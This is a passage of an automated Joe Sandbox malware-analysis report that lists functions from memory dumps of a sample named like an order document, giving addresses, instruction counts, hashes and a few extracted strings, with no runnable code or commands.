Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27ee91f34e19b2464dbb6c3fd08fe334f08a0e528ff3ae6da684415bd92282b6
Instruction ID: 08d69d7025422d56f49510734ace04853a99a860b10e8d11f991e346eca24fcd
Opcode Fuzzy Hash: 27ee91f34e19b2464dbb6c3fd08fe334f08a0e528ff3ae6da684415bd92282b6
Instruction Fuzzy Hash: A241F074A0060ACFCB50DF28C5808A9BBF5FF44318B95C66DD45ACB651EB31F946CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07987661 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9623f9604585f139832a0e44b013e27925b76aa7542b1e5831ad1c8f6561d5af
Instruction ID: 1ec4033b26d20be4dc2a0f4eae5afb6c1fb62fd0a4677801d7f9f6c11fd15ea1
Opcode Fuzzy Hash: 9623f9604585f139832a0e44b013e27925b76aa7542b1e5831ad1c8f6561d5af
Instruction Fuzzy Hash: 392147B53042064BDB6576F8A894ABA379B9FC161CF284079D502CFB99DE29CC42D3D2

Uniqueness

Uniqueness Score: -1.00%

Function 0798A430 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35476891dfe1af9330aea56ddaa94107659818abd31788613a22508e9f91f151
Instruction ID: d339f191e3051c876c0b9dc8e6595ad09108a23d45e6ee38985bba668754a36d
Opcode Fuzzy Hash: 35476891dfe1af9330aea56ddaa94107659818abd31788613a22508e9f91f151
Instruction Fuzzy Hash: 5741E1B4E00218DFDB18DFA5D994A9EBBB2BF89304F14912AE805BB354DB309C45CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0798A27F Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a03021a149a92440814e79a0519e13d7906d5eb5581d7aefaf3f975dcbf0770a
Instruction ID: 371e8921f7ea99632e29175b577d16e4b0cef3d3fd4d54266407a641d358cda7
Opcode Fuzzy Hash: a03021a149a92440814e79a0519e13d7906d5eb5581d7aefaf3f975dcbf0770a
Instruction Fuzzy Hash: C731E774E052199FDB04DFAAD984AAEFBF2FF88304F14C526E419A7354DB349941CB80

Uniqueness

Uniqueness Score: -1.00%

Function 07983E57 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f860049151aa4c0c39a59c18abb5eb1e5799a459dcfae3287478ab508cab027c
Instruction ID: 66f924ad15c41c73e6773f1ab985c5d1254e22ccffb2aebec478ff8968a4a0a3
Opcode Fuzzy Hash: f860049151aa4c0c39a59c18abb5eb1e5799a459dcfae3287478ab508cab027c
Instruction Fuzzy Hash: B2217C74788114ABE71DB6249C66B7F2A97ABC5754F14803AE506DF3C1CE688C038391

Uniqueness

Uniqueness Score: -1.00%

Function 07983E78 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d24dfa9de2ade9b7a197c11cb57cd7dbe7ec7736d8a5b1fc49a957d61f34b68
Instruction ID: 8d1a2b4dca4ff431096f173412ca6e6849eb8d7b3c1d731784ea91f308ad3976
Opcode Fuzzy Hash: 4d24dfa9de2ade9b7a197c11cb57cd7dbe7ec7736d8a5b1fc49a957d61f34b68
Instruction Fuzzy Hash: 7D21D8347882046BE76CBA259C56F7F259BEBC4759F148024F606DB3C0CE789C028795

Uniqueness

Uniqueness Score: -1.00%

Function 07987568 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8288bc45488749efb507bbdddc6792e69b1e61d20b62587122e75df98f925134
Instruction ID: 36c288b387dccfce7400f1eb2370166b2983dce745f5398876258b1083b8f937
Opcode Fuzzy Hash: 8288bc45488749efb507bbdddc6792e69b1e61d20b62587122e75df98f925134
Instruction Fuzzy Hash: C921B5B13182469FC750DFEDA884A7BBBE9EB86354F244825E811C7240DB75DD11CB61

Uniqueness

Uniqueness Score: -1.00%

Function 07985298 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dc4a90a4ca4080dfea0e1817aea20a04caa5dbdc45f80fa0bd599c523c3959e
Instruction ID: 54694c02621a78b0369b644fc5fae29beb0e940d33a6d4a0b9cfbb44039ac77e
Opcode Fuzzy Hash: 9dc4a90a4ca4080dfea0e1817aea20a04caa5dbdc45f80fa0bd599c523c3959e
Instruction Fuzzy Hash: 3F213439744611CFC729AA39E454A2EB796FF88719B09407AE806CB744CF74EC16CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 0798A5B6 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75d5358c012152cd16b48291d1165e6a423958e2930d56bfeb9878cfd6e14c7e
Instruction ID: 43321f28667f3aa31281ea4bf62ec45c5116708b525ffa05b730a85196d55d15
Opcode Fuzzy Hash: 75d5358c012152cd16b48291d1165e6a423958e2930d56bfeb9878cfd6e14c7e
Instruction Fuzzy Hash: 2011B274B48104AFEB58AB609C06FBE7B73FB89344F11C065E606DA184CF348D52DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0F2E1243 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.355795590.000000000F2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f2e0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7891f1c32345cb7ef431fc50cca87f577e7cc21299479a14731004cd6e8275a4
Instruction ID: 6baf8a720c1ed3f6fbd2d5e6896ccd8a6f97345a23c336cc47776930941d23c3
Opcode Fuzzy Hash: 7891f1c32345cb7ef431fc50cca87f577e7cc21299479a14731004cd6e8275a4
Instruction Fuzzy Hash: E901D275D5435A9EC710DBB8E8096DFBFF0AF04220F6085AAC014DB243E7B84186CB80

Uniqueness

Uniqueness Score: -1.00%

Function 07981D98 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f9e890985568fa3b04a67bc8a085805f5734942f36c25735a076d55c0a5a69
Instruction ID: e6c2ce53f6c896ef9dd12a285eb93bbccb22638fdd52fd64886648e81270332f
Opcode Fuzzy Hash: 90f9e890985568fa3b04a67bc8a085805f5734942f36c25735a076d55c0a5a69
Instruction Fuzzy Hash: ECF0F936214119BBDF125F99EC49CEB7F6EFB8C354B048111FA1982121CB368832EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0798EC90 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c56c5a99e3d70ad5df33aeecd0fb4d0e5b9a2ee07246ae423d585e258809c636
Instruction ID: 860f13211fc5732ac454081aeba89171e2014bc1b8b993138b3babf0d302e71d
Opcode Fuzzy Hash: c56c5a99e3d70ad5df33aeecd0fb4d0e5b9a2ee07246ae423d585e258809c636
Instruction Fuzzy Hash: 2EF0F470E08205DBC784EFB4E21A24CBBB6FB89211F24C4A5C409D3244D7348A45CB12

Uniqueness

Uniqueness Score: -1.00%

Function 07981DA8 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd03d29c94befc38274ce1a556f80e8e447ce6641f358084fb8769e094e1c5c0
Instruction ID: bee921a8a3bcd56d00580b0b65282365a3307a76351f12fe52299f1be84a2f2f
Opcode Fuzzy Hash: cd03d29c94befc38274ce1a556f80e8e447ce6641f358084fb8769e094e1c5c0
Instruction Fuzzy Hash: BDF0DA3220411DBF9F125E85EC45CAF7F6EFB8C361B048011FA1982120CB368D32EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0798F1FD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 467194dbec2b5a880240b6cf12cfbf47c61a4bc75a85924fde67c895f12f3957
Instruction ID: 0b5b8af8db39597ba82fb4645a94bb50c9ad0bc77706ed57f59bcac20f9d4397
Opcode Fuzzy Hash: 467194dbec2b5a880240b6cf12cfbf47c61a4bc75a85924fde67c895f12f3957
Instruction Fuzzy Hash: 4301E5B4A11218CFDB94EF24DC94F98B7B1BF89204F408699D009A7260CB309D858F11

Uniqueness

Uniqueness Score: -1.00%

Function 0798AAB0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed1711ea9500257dd1ab5a92011353937a8845fb1941c7adb9dbdac493fac1ad
Instruction ID: a13575a2e605e1b53af69e9bd56ae18c0da5fb48733f9a3912bd1abad875c5d4
Opcode Fuzzy Hash: ed1711ea9500257dd1ab5a92011353937a8845fb1941c7adb9dbdac493fac1ad
Instruction Fuzzy Hash: 11E022356083C9BFCB206AF1AC0A9D6BFADEB06255F0084B3EA0887102D6309028C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0798F75E Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4db97b85e9129826cf3a89dcaa5c4a13963c71838399096233900ebda4314500
Instruction ID: a8e258091066c54141f67c52c34184b4d5f51304a3fb07c9c9123df4ba931cc6
Opcode Fuzzy Hash: 4db97b85e9129826cf3a89dcaa5c4a13963c71838399096233900ebda4314500
Instruction Fuzzy Hash: 52F01D74E0522DCFEB54DFA4C850B9EBBB2FB85304F1085AAC40AAB654D7309D419F21

Uniqueness

Uniqueness Score: -1.00%

Function 079856DF Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c391c7986fe480570c5bdbf98e2df408ede9c304d175ed8e72acebc54da7e1a
Instruction ID: 49c275a140ce87550a23f1d87661d93a1ec42d70ad0b4d47ec270c52ee792881
Opcode Fuzzy Hash: 4c391c7986fe480570c5bdbf98e2df408ede9c304d175ed8e72acebc54da7e1a
Instruction Fuzzy Hash: 64D02B300EE3488FCB82BB71F8604553B32BDC110C3488872C1048E17BDA244D0ACBD5

Uniqueness

Uniqueness Score: -1.00%

Function 079885F0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 9ad09a682a2732380848dff4eba945884e20d25a449a25974481adf993952e66
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 7BC08CB362C5286BA2A4208F7C40EA3BB8CD3C23B8E710137F51CD3200A8829C8001F8

Uniqueness

Uniqueness Score: -1.00%

Function 0F2E11F8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.355795590.000000000F2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f2e0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33bdcbc8f98b148f115e75aa88124f58501dfef3fb8e5c14d2f15e74042ca276
Instruction ID: c822b176dc9828f13ef4f9813934e633dcb1afa68c196f558f0704cc4a50053b
Opcode Fuzzy Hash: 33bdcbc8f98b148f115e75aa88124f58501dfef3fb8e5c14d2f15e74042ca276
Instruction Fuzzy Hash: F2E0B6B0D5021ADFD740EFB9C905A5EBBF4BF08600F6185B9D019E7216E7B49A058F91

Uniqueness

Uniqueness Score: -1.00%

Function 0798F478 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3f5a5d9aa86752c49777d17a1b3c344359bf48e5c7a143629fe3721e277d12
Instruction ID: da1b44065d689f0843e3c6de532c37c2d1b9990f6e796da46ede1f11b2f84710
Opcode Fuzzy Hash: 9f3f5a5d9aa86752c49777d17a1b3c344359bf48e5c7a143629fe3721e277d12
Instruction Fuzzy Hash: 73D05E70E142288BDB94DFA8C88178DFBF6BB85200F10C5D6C12DBB244D7308A84CF11

Uniqueness

Uniqueness Score: -1.00%

Function 079856F0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.353061026.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7980000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3542f88b1e12c9406ad84026be3073d87df3aeeec233773bf2b3d956c79aa0f0
Instruction ID: 64092d069a151c91591846e25738c4fdc0a1482d78cacb653f20223b2a1f483f
Opcode Fuzzy Hash: 3542f88b1e12c9406ad84026be3073d87df3aeeec233773bf2b3d956c79aa0f0
Instruction Fuzzy Hash: FDC0123406D20D8ECA44FB62F591916776A7A802093C8883482058E529DF746C4546D5

Uniqueness

Uniqueness Score: -1.00%

Function 0F2E0470 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.355795590.000000000F2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F2E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f2e0000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1996ced0423f1e17e11e6e41aa4f61ea7e1d27d8176be173a36ab6462f68ff6f
Instruction ID: b423e7e594c8273ed4106e7f0e28a06e5cf9c47e668fc52935e4295ed1d00453
Opcode Fuzzy Hash: 1996ced0423f1e17e11e6e41aa4f61ea7e1d27d8176be173a36ab6462f68ff6f
Instruction Fuzzy Hash: 93C01236A0512D8BCF20CBA4E4046ECBBB1EB8A226F104062D129B2280C274065DABA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07993AB9 Relevance: 5.2, Strings: 4, Instructions: 177COMMON

Download Yara Rule

Strings

O"p, xrefs: 07993B55
{iu%, xrefs: 07993CF6
{iu%, xrefs: 07993CD1
{iu%, xrefs: 07993CD8

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: O"p${iu%${iu%${iu%
API String ID: 0-3423235637
Opcode ID: 6ee4ede8b85e1af12a0044040f0c192ee141c20b6c99a796497e4381f2055577
Instruction ID: 878af301caad40d1064b118836c1a71c61281b7da94dd963ea58f4d9ecc36daf
Opcode Fuzzy Hash: 6ee4ede8b85e1af12a0044040f0c192ee141c20b6c99a796497e4381f2055577
Instruction Fuzzy Hash: 2F7126B0E152098FDF08CFAAD5815EEFBF2FF89210F24952AD415FB214D3749A418B64

Uniqueness

Uniqueness Score: -1.00%

Function 07993AC8 Relevance: 5.2, Strings: 4, Instructions: 173COMMON

Download Yara Rule

Strings

O"p, xrefs: 07993B55
{iu%, xrefs: 07993CF6
{iu%, xrefs: 07993CD1
{iu%, xrefs: 07993CD8

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: O"p${iu%${iu%${iu%
API String ID: 0-3423235637
Opcode ID: df0198b108f9cbad3d3fb07efd2f6ed12690a09bfde77e718ed55c2545163e93
Instruction ID: 0034bfafc3487dda5c78a7ca161e5431f6f6d0f7be543889d0790d7a25eb4edd
Opcode Fuzzy Hash: df0198b108f9cbad3d3fb07efd2f6ed12690a09bfde77e718ed55c2545163e93
Instruction Fuzzy Hash: CE7104B0E152098FDF48CFAAD5815EEFBF2FF89210F24952AD405FB214D374AA418B64

Uniqueness

Uniqueness Score: -1.00%

Function 07993250 Relevance: 2.7, Strings: 2, Instructions: 156COMMON

Download Yara Rule

Strings

{/C, xrefs: 0799335C
{/C, xrefs: 0799336A

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: {/C${/C
API String ID: 0-2408931668
Opcode ID: 8b700b450197734e0f149400e27b99284705dd5229bbc61704dc8bd3a5e66178
Instruction ID: 0b09c6610953c0bc68f0a8148496329ff9bd036ff87b0b5a855dcc4eea0e96a9
Opcode Fuzzy Hash: 8b700b450197734e0f149400e27b99284705dd5229bbc61704dc8bd3a5e66178
Instruction Fuzzy Hash: 236122B0E1421ADFDB04CF99C5809EEFBF2FF89214F218569D405A7248C730AA42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 07993528 Relevance: 1.4, Strings: 1, Instructions: 195COMMON

Download Yara Rule

Strings

/YnW, xrefs: 07993604

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: /YnW
API String ID: 0-3020551989
Opcode ID: 3245cc844beae9ecbd8a89cea6482387ac1a07d32c46b36d3bf447edbb2fa2e4
Instruction ID: 60b5cc3b9000b07da2306a8dc439a62864492dc755027d5fe39f8d8820a89fce
Opcode Fuzzy Hash: 3245cc844beae9ecbd8a89cea6482387ac1a07d32c46b36d3bf447edbb2fa2e4
Instruction Fuzzy Hash: DB8127B4E1520AEFEF04CFA9D4809EEFBB2BF49314F14846AD515AB204D7349A41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07993242 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

{/C, xrefs: 0799336A

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: {/C
API String ID: 0-1847916924
Opcode ID: 314e93708ab5b2d1d8bfcd2cfb3a1fd60510dfa4308d9e1b2288e865d5360bbe
Instruction ID: ebc896c1894bd791649b34de21f94a7f21a6c6adebec3c24736b7f2575e57757
Opcode Fuzzy Hash: 314e93708ab5b2d1d8bfcd2cfb3a1fd60510dfa4308d9e1b2288e865d5360bbe
Instruction Fuzzy Hash: 857121B4E1021ADFDB04CF98D9849EEFBF2FF89214F208566D404A7354D730AA42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 079926F0 Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

0405, xrefs: 0799292E

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: 0405
API String ID: 0-2079889441
Opcode ID: 84d2696340f686db42a9887b4c6fa945732594a60cb78a72af9d972d33dd1d68
Instruction ID: 09cf15fe9afefb3d39ff2ab817e589990fee2d6f9cfe817ee1888b1bffe4510a
Opcode Fuzzy Hash: 84d2696340f686db42a9887b4c6fa945732594a60cb78a72af9d972d33dd1d68
Instruction Fuzzy Hash: D081F1B4A10219DFCB44CFA9C5849AEFBF1FF89354F24856AD415AB324C770AA42CF51

Uniqueness

Uniqueness Score: -1.00%

Function 079926E2 Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

0405, xrefs: 0799292E

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: 0405
API String ID: 0-2079889441
Opcode ID: e38ea831c0059460f3b2402c366d888c4f06d4d311f33bc8ba6c8525d6fa8efd
Instruction ID: 7cdf5d6f1a2d1debd8c169548e00d8b5855ce9b9e3fb1ee2ba064ebd14437207
Opcode Fuzzy Hash: e38ea831c0059460f3b2402c366d888c4f06d4d311f33bc8ba6c8525d6fa8efd
Instruction Fuzzy Hash: A67100B4A10209DFCB44CFA9CA8499EFBF1FF89354F24856AD415AB324D770AA42CF51

Uniqueness

Uniqueness Score: -1.00%

Function 07999050 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

V9P?, xrefs: 079992C0

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: V9P?
API String ID: 0-3896844564
Opcode ID: e771d95fe0036e047b1ffd1ac4d78c716efe5c42793f3b15d083ace621bde45c
Instruction ID: aabe5e72825231cd3f23ece674fb2bb6f437bb0e1e0e2ce40e1bb1914ae79652
Opcode Fuzzy Hash: e771d95fe0036e047b1ffd1ac4d78c716efe5c42793f3b15d083ace621bde45c
Instruction Fuzzy Hash: EE7118B0E146198FDB54DF69D980A9EFBB2FF89314F1481AAD408A7315DB30AE41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 07999043 Relevance: 1.4, Strings: 1, Instructions: 166COMMON

Download Yara Rule

Strings

V9P?, xrefs: 079992C0

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: V9P?
API String ID: 0-3896844564
Opcode ID: ff183788f6b75f62b339b84ba878437cfa9e5d58c7b7429f21a7e981554aa0b1
Instruction ID: 30813360c1fad5d6c4b9db316a90877a0b1f44d3844419886a288e79cf9a1812
Opcode Fuzzy Hash: ff183788f6b75f62b339b84ba878437cfa9e5d58c7b7429f21a7e981554aa0b1
Instruction Fuzzy Hash: 737139B4E152198FDB14DF69C980A9EFBF2BF89314F1481AAD408A7315DB30AE41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 07993D48 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

#-`, xrefs: 07993E11

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: #-`
API String ID: 0-1186865238
Opcode ID: ff4b0e057ffbc6396ec29900e7ab2c7ff60787862fc781d017f973210e406c89
Instruction ID: 7e7c1d76b0cc179259f5ba208d5e27be6398caf96a02fffa45d92bdcfbdf3680
Opcode Fuzzy Hash: ff4b0e057ffbc6396ec29900e7ab2c7ff60787862fc781d017f973210e406c89
Instruction Fuzzy Hash: 6A4115B4E1560A9BDF48CFEAC5814AEFBF2BF89304F24C46AC505E7214D3349A418B95

Uniqueness

Uniqueness Score: -1.00%

Function 07993D58 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

#-`, xrefs: 07993E11

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: #-`
API String ID: 0-1186865238
Opcode ID: 850f3af812a85396e280a9744bc675d0dbe54df0c0efba46c9f2b52b1bdf7677
Instruction ID: e1540661508534823da2f2e1f204ff49cde4661f0b2412ffe47f0e97efa12ccc
Opcode Fuzzy Hash: 850f3af812a85396e280a9744bc675d0dbe54df0c0efba46c9f2b52b1bdf7677
Instruction Fuzzy Hash: 7C4127B0E1520ADBEF48CFE9C5814AEFBF2BF89304F24C46AC505A7214D3749A418B95

Uniqueness

Uniqueness Score: -1.00%

Function 079938B0 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

!JC, xrefs: 079939B0

Memory Dump Source

Source File: 00000000.00000002.353170945.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7990000_ORDER (6256 OS)#391 PI.jbxd

Similarity

API ID:
String ID: !JC
API String ID: 0-2464361168
